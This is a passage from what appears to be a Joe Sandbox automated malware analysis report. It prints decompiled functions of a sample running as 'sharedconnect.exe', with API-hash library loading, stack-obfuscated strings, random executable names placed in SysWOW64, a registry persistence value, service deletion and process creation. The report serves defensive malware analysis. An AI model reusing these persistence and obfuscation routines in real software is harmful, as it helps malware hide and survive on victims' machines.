				 *((intOrPtr*)(_t24 - 8)) = 0x780065;
				 *((intOrPtr*)(_t24 - 4)) = __ecx;
				if( *_t1 == 0) {
					L01487C70(__eax);
				} else {
					L01487C50();
				}
				L01487BD0(L01481BA0(_t18, _t21));
				L01481BF0(_t11);
				return  *0x148a7cc("C:\Windows\SysWOW64\sharedconnect.exe", 0x104, _t24 - 0x14, "C:\Windows\SysWOW64", "sharedconnect", _t18, _t21);
			}

0x01487d07
0x01487d0c
0x01487d0c
0x01487d12
0x01487d19
0x01487d20
0x01487d27
0x01487d2e
0x01487d31
0x01487d3a
0x01487d33
0x01487d33
0x01487d33
0x01487d4a
0x01487d51
0x01487d7b

APIs

_snwprintf.NTDLL ref: 01487D6E

Strings

C:\Windows\SysWOW64, xrefs: 01487D5B
e, xrefs: 01487D27
sharedconnect, xrefs: 01487D56
s, xrefs: 01487D20
\, xrefs: 01487D19
C:\Windows\SysWOW64\sharedconnect.exe, xrefs: 01487D69
%, xrefs: 01487D12

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: _snwprintf
String ID: %$C:\Windows\SysWOW64$C:\Windows\SysWOW64\sharedconnect.exe$\$e$s$sharedconnect
API String ID: 3988819677-2451313573
Opcode ID: 8166e8576981e270437e7725be0cab36274aae78257a83e4321959d638b5253f
Instruction ID: c1db5cc6eba1b1b99420eef4227bb7225d0098fb3860560fb6c92bb6374dbbf1
Opcode Fuzzy Hash: 8166e8576981e270437e7725be0cab36274aae78257a83e4321959d638b5253f
Instruction Fuzzy Hash: 74F0E9B09512099BC700BFA548646AE7AB49F20706F70405FD4146B220DBFA465647E6

Uniqueness

Uniqueness Score: -1.00%

Function 01486C3B, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 58
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01486C3B(short __eax) {
				void* _t51;
				void* _t54;
				void* _t55;

				 *(_t55 - 0x1c) = 0x640061;
				 *((short*)(_t55 - 4)) = __eax;
				 *((intOrPtr*)(_t55 - 0x18)) = 0x610076;
				 *((intOrPtr*)(_t55 - 0x14)) = 0x690070;
				 *((intOrPtr*)(_t55 - 0x10)) = 0x320033;
				 *((intOrPtr*)(_t55 - 0xc)) = 0x64002e;
				 *((intOrPtr*)(_t55 - 8)) = 0x6c006c;
				 *((intOrPtr*)(_t55 - 0xb0)) = 0x33cc4020;
				 *((intOrPtr*)(_t55 - 0xac)) = 0x9f0daa96;
				 *((intOrPtr*)(_t55 - 0xa8)) = 0x5ca0b0ad;
				 *((intOrPtr*)(_t55 - 0xa4)) = 0x1c96886d;
				 *((intOrPtr*)(_t55 - 0xa0)) = 0xe391654b;
				 *((intOrPtr*)(_t55 - 0x9c)) = 0x6904e160;
				 *((intOrPtr*)(_t55 - 0x98)) = 0x997c2bb6;
				 *((intOrPtr*)(_t55 - 0x94)) = 0x94d35bd5;
				 *((intOrPtr*)(_t55 - 0x90)) = 0xbee2db1f;
				 *((intOrPtr*)(_t55 - 0x8c)) = 0x63d42b4;
				 *((intOrPtr*)(_t55 - 0x88)) = 0x4dfe2e46;
				 *((intOrPtr*)(_t55 - 0x84)) = 0x37177fe4;
				 *((intOrPtr*)(_t55 - 0x80)) = 0xbc69ca64;
				 *((intOrPtr*)(_t55 - 0x7c)) = 0x5ded52fa;
				 *((intOrPtr*)(_t55 - 0x78)) = 0x3bfe6937;
				 *((intOrPtr*)(_t55 - 0x74)) = 0xa27d54c5;
				 *((intOrPtr*)(_t55 - 0x70)) = 0x3b36f17e;
				 *((intOrPtr*)(_t55 - 0x6c)) = 0xa97569b5;
				 *((intOrPtr*)(_t55 - 0x68)) = 0x3d04be79;
				 *((intOrPtr*)(_t55 - 0x64)) = 0x3e86ae46;
				 *((intOrPtr*)(_t55 - 0x60)) = 0x6e587f2a;
				 *((intOrPtr*)(_t55 - 0x5c)) = 0x87244c93;
				 *((intOrPtr*)(_t55 - 0x58)) = 0x72885b33;
				 *((intOrPtr*)(_t55 - 0x54)) = 0x3f8fc85;
				 *((intOrPtr*)(_t55 - 0x50)) = 0xdd1920a8;
				 *((intOrPtr*)(_t55 - 0x4c)) = 0xd730e46d;
				 *((intOrPtr*)(_t55 - 0x48)) = 0xd2f5ba1b;
				 *((intOrPtr*)(_t55 - 0x44)) = 0x1c079652;
				 *((intOrPtr*)(_t55 - 0x40)) = 0x2315069c;
				 *((intOrPtr*)(_t55 - 0x3c)) = 0xe15cc32;
				 *((intOrPtr*)(_t55 - 0x38)) = 0xad9cb11c;
				 *((intOrPtr*)(_t55 - 0x34)) = 0xcd8e55ea;
				 *((intOrPtr*)(_t55 - 0x30)) = 0xe4d3dd96;
				 *((intOrPtr*)(_t55 - 0x2c)) = 0xf2e75668;
				 *((intOrPtr*)(_t55 - 0x28)) = 0x5ce7d387;
				 *((intOrPtr*)(_t55 - 0x24)) = 0x2ccd65a4;
				 *((intOrPtr*)(_t55 - 0x20)) = 0x580ea151;
				 *0x148a850 = LoadLibraryW(_t55 - 0x1c);
				return E01481620(_t51, _t49, _t55 - 0xb0, _t54, 0x25, 0x31dbb1c1, 0x148a5e0);
			}

0x01486c3b
0x01486c42
0x01486c4a
0x01486c51
0x01486c58
0x01486c5f
0x01486c66
0x01486c6d
0x01486c77
0x01486c81
0x01486c8b
0x01486c95
0x01486c9f
0x01486ca9
0x01486cb3
0x01486cbd
0x01486cc7
0x01486cd1
0x01486cdb
0x01486ce5
0x01486cec
0x01486cf3
0x01486cfa
0x01486d01
0x01486d08
0x01486d0f
0x01486d16
0x01486d1d
0x01486d24
0x01486d2b
0x01486d32
0x01486d39
0x01486d40
0x01486d47
0x01486d4e
0x01486d55
0x01486d5c
0x01486d63
0x01486d6a
0x01486d71
0x01486d78
0x01486d7f
0x01486d86
0x01486d8d
0x01486dac
0x01486dbe

APIs

LoadLibraryW.KERNEL32 ref: 01486D94

Strings

3, xrefs: 01486C58
a, xrefs: 01486C3B
p, xrefs: 01486C51
l, xrefs: 01486C66
., xrefs: 01486C5F
v, xrefs: 01486C4A

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: .$3$a$l$p$v
API String ID: 1029625771-1296750983
Opcode ID: 8d58e6938c59209d4e1bb751bb4e7fcd20420efad9193ad54b059d762e3c6668
Instruction ID: 4818cba703269f5025600ce581331c313ebdb20c173a17e32f45cd6f8f7c46ac
Opcode Fuzzy Hash: 8d58e6938c59209d4e1bb751bb4e7fcd20420efad9193ad54b059d762e3c6668
Instruction Fuzzy Hash: 9D31C8B0D00368DFDB20CF91AA8568DBBB1BB05744F20868CC1583B215DBB10A86CF96

Uniqueness

Uniqueness Score: -1.00%

Function 0148726A, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0148726A(void* __eax) {
				void* _t19;
				void* _t23;

				 *((intOrPtr*)(_t23 - 0x18)) = 0x6c0047;
				 *((short*)(_t23 - 4)) = 0;
				 *((intOrPtr*)(_t23 - 0x14)) = 0x62006f;
				 *((intOrPtr*)(_t23 - 0x10)) = 0x6c0061;
				 *((intOrPtr*)(_t23 - 0xc)) = 0x45005c;
				 *((intOrPtr*)(_t23 - 8)) = 0x580025;
				 *0x148a7cc(_t23 - 0x98, 0x40, _t23 - 0x18);
				_t19 = CreateEventW(0, 0, 0, _t23 - 0x98);
				 *0x148a82c = _t19;
				return 0 | _t19 != 0x00000000;
			}

0x01487271
0x01487278
0x01487286
0x01487290
0x01487297
0x0148729e
0x014872a5
0x014872bb
0x014872c3
0x014872d2

APIs

_snwprintf.NTDLL ref: 014872A5
CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 014872BB

Strings

\, xrefs: 01487297
o, xrefs: 01487286
a, xrefs: 01487290
G, xrefs: 01487271
%, xrefs: 0148729E

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: CreateEvent_snwprintf
String ID: %$G$\$a$o
API String ID: 3138640819-4186019298
Opcode ID: bb8afb22b9a33d196fbbd765ce5082635746704a0f7872e0927b08dbc3f535bd
Instruction ID: 4cc8c4edf1e48aade4191f5732bec582c78cd50f01392670c30acaab87abfcec
Opcode Fuzzy Hash: bb8afb22b9a33d196fbbd765ce5082635746704a0f7872e0927b08dbc3f535bd
Instruction Fuzzy Hash: 52F054B0A10209DBE751DFA49C05BED7BF8EF04705F10405FAA0DE7281D7B196888F98

Uniqueness

Uniqueness Score: -1.00%

Function 01486E39, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 20
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01486E39(WCHAR* __eax) {
				void* _t12;
				void* _t15;
				void* _t16;

				 *((intOrPtr*)(_t16 - 0x1c)) = 0x720063;
				 *((intOrPtr*)(_t16 - 0x18)) = 0x700079;
				 *((intOrPtr*)(_t16 - 0x14)) = 0x330074;
				 *((intOrPtr*)(_t16 - 0x10)) = 0x2e0032;
				 *((intOrPtr*)(_t16 - 0xc)) = 0x6c0064;
				 *((intOrPtr*)(_t16 - 8)) = 0x6c;
				 *((intOrPtr*)(_t16 - 4)) = 0x921bd614;
				 *0x148a858 = LoadLibraryW(__eax);
				return E01481620(_t12, _t10, _t16 - 4, _t15, 1, 0x7767dfda, 0x148a674);
			}

0x01486e39
0x01486e41
0x01486e48
0x01486e4f
0x01486e56
0x01486e5d
0x01486e64
0x01486e80
0x01486e92

APIs

LoadLibraryW.KERNEL32 ref: 01486E6B

Strings

c, xrefs: 01486E39
y, xrefs: 01486E41
t, xrefs: 01486E48
d, xrefs: 01486E56
l, xrefs: 01486E5D
2, xrefs: 01486E4F

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: 2$c$d$l$t$y
API String ID: 1029625771-1585075223
Opcode ID: 7b6dd16b4d0ca49717fc50bf9e91e0c5a0813356e27183fd8f01c19fd9be3b90
Instruction ID: b52cc60bd52652e2d6d0209fc4168d35676f38b69c71f1daf7a973614a6a7026
Opcode Fuzzy Hash: 7b6dd16b4d0ca49717fc50bf9e91e0c5a0813356e27183fd8f01c19fd9be3b90
Instruction Fuzzy Hash: 91E039B0D40209EFDB00DF91A5487ACBBB1EB50708F20425ED5487B258D3FA07548FD0

Uniqueness

Uniqueness Score: -1.00%

Function 01481258, Relevance: 9.0, APIs: 6, Instructions: 27
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E01481258(void* __esi) {
				void* _t14;
				void* _t17;
				void* _t19;
				void* _t21;

				_t19 = __esi;
				GetModuleFileNameW(??, ??, ??);
				_push(_t21 - 0x30);
				_push(0x80);
				if(L01481E60(__esi) != 0) {
					WaitForSingleObject(_t17, 0xffffffff);
					CloseHandle( *(_t21 - 0x30));
					CloseHandle( *(_t21 - 0x2c));
				}
				CloseHandle(_t17);
				CloseHandle(_t14);
				return _t19;
			}

0x01481258
0x01481258
0x01481261
0x01481262
0x01481277
0x0148127c
0x01481285
0x0148128e
0x0148128e
0x01481295
0x0148129c
0x014812aa

APIs

GetModuleFileNameW.KERNEL32 ref: 01481258
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0148127C
CloseHandle.KERNEL32(?,?,000000FF), ref: 01481285
CloseHandle.KERNEL32(?,?,000000FF), ref: 0148128E
CloseHandle.KERNEL32(?,?,000000FF), ref: 01481295
CloseHandle.KERNEL32(?,?,?,000000FF), ref: 0148129C

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: CloseHandle$FileModuleNameObjectSingleWait
String ID:
API String ID: 2436384749-0
Opcode ID: ea3697dabd2df51b6cff1ab8c7cd518764ea1655be964ed1f035a15c421ecf4a
Instruction ID: bfd05f77b2aa2a1dabb52564a8c99178c297b4ee85165ebe504a4f796cc6fb0b
Opcode Fuzzy Hash: ea3697dabd2df51b6cff1ab8c7cd518764ea1655be964ed1f035a15c421ecf4a
Instruction Fuzzy Hash: 77E03032500214ABCB117BE4FC48AADB738FF04612B20411BF606D20B4DB758511DB50

Uniqueness

Uniqueness Score: -1.00%

Function 014880BC, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
serviceCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E014880BC(void* __eax, void* __ecx) {
				void* _t13;
				int _t14;
				void* _t18;
				void* _t23;

				 *((intOrPtr*)(_t23 - 8)) = 0x580025;
				 *((short*)(_t23 - 4)) = 0;
				 *0x148a7cc(_t23 - 0x210, 0x104, _t23 - 8);
				_t13 = OpenServiceW(__ecx, _t23 - 0x210, 0x10000);
				_t18 = _t13;
				if(_t18 == 0) {
					goto 0x1491af0;
					asm("int3");
					asm("int3");
					return _t13;
				} else {
					_t14 = DeleteService(_t18);
					CloseServiceHandle(_t18);
					return _t14;
				}
			}

0x014880c3
0x014880ca
0x014880e0
0x014880f6
0x014880fc
0x01488100
0x0148811a
0x0148811f
0x01488120
0x01488121
0x01488102
0x01488103
0x0148810c
0x01488119
0x01488119

APIs

_snwprintf.NTDLL ref: 014880E0
OpenServiceW.ADVAPI32(?,?,00010000), ref: 014880F6
DeleteService.ADVAPI32(00000000,?,?,00010000), ref: 01488103
CloseServiceHandle.ADVAPI32(00000000,?,?,00010000), ref: 0148810C

Strings

%, xrefs: 014880C3

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: Service$CloseDeleteHandleOpen_snwprintf
String ID: %
API String ID: 88604382-2567322570
Opcode ID: debe574286c2f79965da8e73a1a3b40e003dd4b276770d66817e8657b56191ad
Instruction ID: 4d6429db9c0d60d7768f574e01ba1af3b1d6c0d1e8da3009c92a106e07e1cd28
Opcode Fuzzy Hash: debe574286c2f79965da8e73a1a3b40e003dd4b276770d66817e8657b56191ad
Instruction Fuzzy Hash: 76F0AE72900118A7C721DB989C48AEEB7BCFF44711F14059BF605E3214EBF089844754

Uniqueness

Uniqueness Score: -1.00%

Function 01488220, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01488220(WCHAR* __ecx) {
				WCHAR* _t19;
				signed int _t23;
				signed int _t24;
				signed int _t25;
				void* _t28;

				_t19 = __ecx;
				lstrcpyW(__ecx, "C:\Windows\SysWOW64");
				_t23 = lstrlenW(_t19);
				_t19[_t23] = 0x5c;
				_t24 = _t23 + 1;
				_t28 = (GetTickCount() & 0x0000000f) + 4;
				L01482040( &(_t19[_t24]), _t28);
				_t25 = _t24 + _t28;
				_t19[_t25] = 0x65002e;
				 *((intOrPtr*)(_t19 + 4 + _t25 * 2)) = 0x650078;
				 *((short*)(_t19 + 8 + _t25 * 2)) = 0;
				return 0;
			}

0x01488223
0x0148822b
0x01488238
0x0148823f
0x01488243
0x01488252
0x01488257
0x0148825c
0x01488260
0x01488267
0x0148826f
0x01488277

APIs

lstrcpyW.KERNEL32(?,C:\Windows\SysWOW64), ref: 0148822B
lstrlenW.KERNEL32(?,?,C:\Windows\SysWOW64), ref: 01488232
GetTickCount.KERNEL32 ref: 01488244

Strings

C:\Windows\SysWOW64, xrefs: 01488225
x, xrefs: 01488267

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: CountTicklstrcpylstrlen
String ID: C:\Windows\SysWOW64$x
API String ID: 974621299-2963027263
Opcode ID: 728e5d02787d6f7f6b5c63dcc0ab20060b6ff9b3f25dd43e506b6a2f74f72b9c
Instruction ID: 380ddcd3d4dc3bb91a89ef9fa2f444a4631262420e3240bbed010836b8a10120
Opcode Fuzzy Hash: 728e5d02787d6f7f6b5c63dcc0ab20060b6ff9b3f25dd43e506b6a2f74f72b9c
Instruction Fuzzy Hash: 54F0E5B7A042156BD7206FA0DC8460E37A6EF94356B24507AEC06DB32ADBB9C841C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 014811A3, Relevance: 7.5, APIs: 5, Instructions: 22COMMON

Download Yara Rule

APIs

_snwprintf.NTDLL ref: 014811A3
CreateEventW.KERNEL32(?,00000001,?,?), ref: 014811B7
SetEvent.KERNEL32(00000000,?,00000001,?,?), ref: 014811C4
CloseHandle.KERNEL32(00000000,?,00000001,?,?), ref: 014811CB
CloseHandle.KERNEL32(00000000), ref: 014811DA

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$Create_snwprintf
String ID:
API String ID: 2675716504-0
Opcode ID: ec6b2fb964fd4e617adb6238ae6c71e0b4879dc5d2ff290285da066623846e70
Instruction ID: e91c9c84c28cfb06f07e0a37175409c438e1d8a593d5bba2d6b7ceb9a4c14f3c
Opcode Fuzzy Hash: ec6b2fb964fd4e617adb6238ae6c71e0b4879dc5d2ff290285da066623846e70
Instruction Fuzzy Hash: 58E04F72800210ABD7327B24984CBAF3A7CEF44B15F25004BFE0AA3229DBB5C582DB51

Uniqueness

Uniqueness Score: -1.00%

Function 01481E71, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37
processCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E01481E71(WCHAR* __esi) {
				int _t11;
				void* _t17;
				void* _t21;

				E01481870(_t17);
				 *(_t21 - 0x58) = 0x44;
				_t11 = CreateProcessW(__esi, 0, 0, 0, 0,  *(_t21 + 8), 0, 0, _t21 - 0x58, _t21 - 0x10);
				if(_t11 == 0) {
					goto 0x14905e9;
					asm("int3");
					return _t11;
				} else {
					if( *((intOrPtr*)(_t21 + 0xc)) == 0) {
						CloseHandle( *(_t21 - 0x10));
						CloseHandle( *(_t21 - 0xc));
						return 1;
					} else {
						asm("movdqu xmm0, [ebp-0x10]");
						asm("movdqu [eax], xmm0");
						return 1;
					}
				}
			}

0x01481e71
0x01481e79
0x01481e95
0x01481e9d
0x01481ed5
0x01481eda
0x01481edb
0x01481e9f
0x01481ea4
0x01481ebc
0x01481ec5
0x01481ed4
0x01481ea6
0x01481ea6
0x01481eab
0x01481eb8
0x01481eb8
0x01481ea4

APIs

CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,00000044,?), ref: 01481E95
CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,00000000,00000000,00000044,?), ref: 01481EBC
CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,00000000,00000000,00000044,?), ref: 01481EC5

Strings

D, xrefs: 01481E79

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess
String ID: D
API String ID: 2922976086-2746444292
Opcode ID: 618938dd33e7b5f12ad9901117564553824cfd39029b39f7087f67ed91b43cd3
Instruction ID: 1f3f4400824165cbb2fba96a9d172ddd8e839548a18a36ba81734bc9b40c7804
Opcode Fuzzy Hash: 618938dd33e7b5f12ad9901117564553824cfd39029b39f7087f67ed91b43cd3
Instruction Fuzzy Hash: 08F09071A50209ABEB315F98EC05FED7B78EF04B10F204157FA09AA2E0DBB595408794

Uniqueness

Uniqueness Score: -1.00%

Function 01488500, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32
stringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E01488500(WCHAR* __ecx) {
				WCHAR* _t19;
				signed int _t23;
				signed int _t24;
				signed int _t25;
				void* _t28;

				_t19 = __ecx;
				 *0x148a67c(0, 0x23, 0, 0, __ecx);
				_t23 = lstrlenW(__ecx);
				 *((short*)(_t19 + _t23 * 2)) = 0x5c;
				_t24 = _t23 + 1;
				_t28 = (GetTickCount() & 0x0000000f) + 4;
				L01482040(_t19 + _t24 * 2, _t28);
				_t25 = _t24 + _t28;
				 *((intOrPtr*)(_t19 + _t25 * 2)) = 0x65002e;
				 *((intOrPtr*)(_t19 + 4 + _t25 * 2)) = 0x650078;
				 *((short*)(_t19 + 8 + _t25 * 2)) = 0;
				return 0;
			}

0x01488503
0x0148850e
0x0148851b
0x01488522
0x01488526
0x01488535
0x0148853a
0x0148853f
0x01488543
0x0148854a
0x01488552
0x0148855a

APIs

SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000), ref: 0148850E
lstrlenW.KERNEL32 ref: 01488515
GetTickCount.KERNEL32 ref: 01488527

Strings

x, xrefs: 0148854A

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: CountFolderPathTicklstrlen
String ID: x
API String ID: 2993136144-2363233923
Opcode ID: 0c317840f603b2ff2ffbbf2defe5b9f6999462fdd37b7172c7f8ff9034d49b93
Instruction ID: 04774d33d06d9dcb58b2d374d4128f7ca1c496c672aec1bbedf3f7fed956b08e
Opcode Fuzzy Hash: 0c317840f603b2ff2ffbbf2defe5b9f6999462fdd37b7172c7f8ff9034d49b93
Instruction Fuzzy Hash: CEF027B76043046BE7202FA0DC84B0D36A5DF44356F24407AEA06EF29ADBB5C80087A0

Uniqueness

Uniqueness Score: -1.00%

Function 0148849B, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20
registryCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E0148849B(signed int __esi) {
				long _t6;
				void* _t14;

				_t6 = RegCreateKeyExW();
				if(_t6 == 0) {
					RegSetValueExW( *(_t14 - 4), "sharedconnect", 0, 1, _t14 - 0x274, 2 + __esi * 2);
					_t6 = RegCloseKey( *(_t14 - 4));
				}
				return _t6;
			}

0x0148849b
0x014884a3
0x014884c0
0x014884c9
0x014884c9
0x014884d5

APIs

RegCreateKeyExW.ADVAPI32 ref: 0148849B
RegSetValueExW.ADVAPI32(?,sharedconnect,00000000,00000001,?,00000000), ref: 014884C0
RegCloseKey.ADVAPI32(?), ref: 014884C9

Strings

sharedconnect, xrefs: 014884B8

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: sharedconnect
API String ID: 1818849710-3993246888
Opcode ID: 33d1cc557f2374e75dde2fbd5a5ea9af003c637dbb47c216d00fd312418fa74a
Instruction ID: b448cf08dda9a3f564b71e123c7c47a7509bdcd9e385b02685722e21441c4c09
Opcode Fuzzy Hash: 33d1cc557f2374e75dde2fbd5a5ea9af003c637dbb47c216d00fd312418fa74a
Instruction Fuzzy Hash: 68E08632600108EBDB209B54ED4DB9D7738EF44701F600177F509E2024D7B559408B50

Uniqueness

Uniqueness Score: -1.00%

Function 01488648, Relevance: 6.0, APIs: 4, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E01488648(void* __ecx) {
				int _t10;
				void* _t16;

				 *0x148a7cc();
				_push(_t16 - 0x20);
				_push( *(_t16 - 4));
				if(L01481EE0(_t16 - 0x430) != 0) {
					CloseHandle( *(_t16 - 0x20));
					CloseHandle( *(_t16 - 0x1c));
				}
				_t10 = CloseHandle( *(_t16 - 4));
				return _t10;
			}

0x01488648
0x0148865a
0x0148865b
0x01488669
0x0148866e
0x01488677
0x01488677
0x01488680
0x0148868a

APIs

_snwprintf.NTDLL ref: 01488648
CloseHandle.KERNEL32(?), ref: 0148866E
CloseHandle.KERNEL32(?), ref: 01488677
CloseHandle.KERNEL32(?), ref: 01488680

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742552249.000000000148A000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1480000_sharedconnect.jbxd

Yara matches

Similarity

API ID: CloseHandle$_snwprintf
String ID:
API String ID: 2398838028-0
Opcode ID: 6235ae21ee14ba58fd09eb927bff8841a38295fede82eda45e47f1d104f9db52
Instruction ID: 5d6be302cbb26b8e9919f76890a8df6f619fe6dd1b8209f77d22893ec5c993d6
Opcode Fuzzy Hash: 6235ae21ee14ba58fd09eb927bff8841a38295fede82eda45e47f1d104f9db52
Instruction Fuzzy Hash: 5DE04831C10109DFCF11BFD4EC049ED7B35FF04205F104156EA05A1035D7728624EB50

Uniqueness

Uniqueness Score: -1.00%

Function 01488060, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E01488060() {
				int _t5;
				WCHAR* _t11;
				void* _t13;

				GetTempPathW();
				_t5 = GetTempFileNameW(_t13 - 0x208, _t11, _t11, _t13 - 0x208);
				if(L01481340(_t5, 0x148aab0, _t13 - 0x208) != 0) {
					goto 0x1491abf;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("aam 0xcd");
					_t11 = _t6;
				}
				L014813A0(_t6);
				return _t11;
			}

0x01488060
0x01488070
0x01488088
0x0148808a
0x0148808f
0x01488090
0x01488091
0x01488092
0x01488099
0x01488099
0x0148809b
0x014880a6

APIs

GetTempPathW.KERNEL32 ref: 01488060
GetTempFileNameW.KERNEL32(?,?,?,?), ref: 01488070

Strings

C:\Windows\SysWOW64\sharedconnect.exe, xrefs: 0148807C

Memory Dump Source

Source File: 00000007.00000002.742507592.0000000001481000.00000020.00000001.sdmp, Offset: 01480000, based on PE: true

Associated: 00000007.00000002.742494527.0000000001480000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.742536211.0000000001489000.00000002.00000001.sdmp Download File
